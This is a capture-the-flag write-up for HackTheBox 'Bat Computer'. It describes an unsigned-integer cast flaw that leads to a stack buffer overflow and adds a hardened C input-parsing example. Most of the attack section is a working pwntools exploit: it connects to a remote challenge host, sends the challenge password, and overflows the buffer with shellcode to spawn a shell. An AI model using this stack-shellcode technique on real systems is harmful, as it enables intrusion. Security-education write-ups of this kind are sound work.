We covered a buffer overflow scenario in which a variable was declared as an unsigned integer and then cast to ulong. This let us send '-1' as input to this variable, which redirected program execution into an if statement containing a snippet where a 96-byte name variable accepts unrestricted input from the user, resulting in a segmentation fault. We calculated the offset using pwndbg with Python and created the final exploit. This was part of HackTheBox Bat Computer | Intro to binary exploitation.
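The two input-handling flaws described above, with a hardened form of each, as an added C example (not the challenge's source, which this page does not show). The names parse_count and store_name and the upper limit of 100 are hypothetical; only the 96-byte buffer size comes from the write-up.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 96 /* size of the name buffer quoted in the write-up */

/* Weak pattern, for contrast (assumed shape, not the challenge's source):
 *   scanf("%lu", &n);   "-1" is accepted and wraps to ULONG_MAX
 *   scanf("%s", name);  no length limit on a NAME_LEN-byte buffer */

/* strtoul() also accepts "-1" and returns ULONG_MAX, so require a leading
 * digit, then range-check. Returns 0 on success, -1 on rejection. */
int parse_count(const char *s, unsigned long max, unsigned long *out)
{
    char *end;
    while (isspace((unsigned char)*s)) s++;
    if (!isdigit((unsigned char)*s)) return -1;   /* rejects '-', '+', empty */
    errno = 0;
    unsigned long v = strtoul(s, &end, 10);
    if (errno == ERANGE || v > max) return -1;
    while (isspace((unsigned char)*end)) end++;
    if (*end != '\0') return -1;                  /* trailing junk */
    *out = v;
    return 0;
}

/* Copy one input line into the fixed buffer; over-long input is rejected
 * instead of being written past the end. Returns 0 on success. */
int store_name(char dst[NAME_LEN], const char *line)
{
    size_t n = strcspn(line, "\r\n");
    if (n >= NAME_LEN) return -1;                 /* need room for the NUL */
    memcpy(dst, line, n);
    dst[n] = '\0';
    return 0;
}

int main(void)
{
    unsigned long v = 0;
    char name[NAME_LEN], big[200];
    memset(big, 'A', sizeof big - 1);             /* constructed over-long input */
    big[sizeof big - 1] = '\0';
    printf("strtoul(\"-1\")      = %lu\n", strtoul("-1", NULL, 10));
    printf("parse_count(\"-1\")  = %d\n", parse_count("-1", 100, &v));
    printf("store_name(199 A) = %d\n", store_name(name, big));
    return 0;
}
```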

The exploit code is below.

##Beginning

from pwn import *

# Load the challenge binary so pwntools picks up its architecture
context.binary = ELF('./batcomputer')

con = remote('157.245.39.76', 31662)

# Send '1', then parse the hex address the program prints after '0x'
con.sendline(b'1')
con.recvuntil(b'0x')
stack_base = int(("0x" + con.recv().decode('latin-1').split()[0]), 16)
log.success(f'stack base: {hex(stack_base)}')

# Send '2' followed by the password
con.sendline(b'2')
con.sendline(b'b4tp@$$w0rd!')

payload = asm(shellcraft.popad() + shellcraft.sh())  # shellcode
payload += b'A' * (84 - len(payload))  # pad the payload to 84 bytes
payload += p64(stack_base)  # stack base

con.sendline(payload)

con.sendline(b'3')
con.interactive()

##Ending
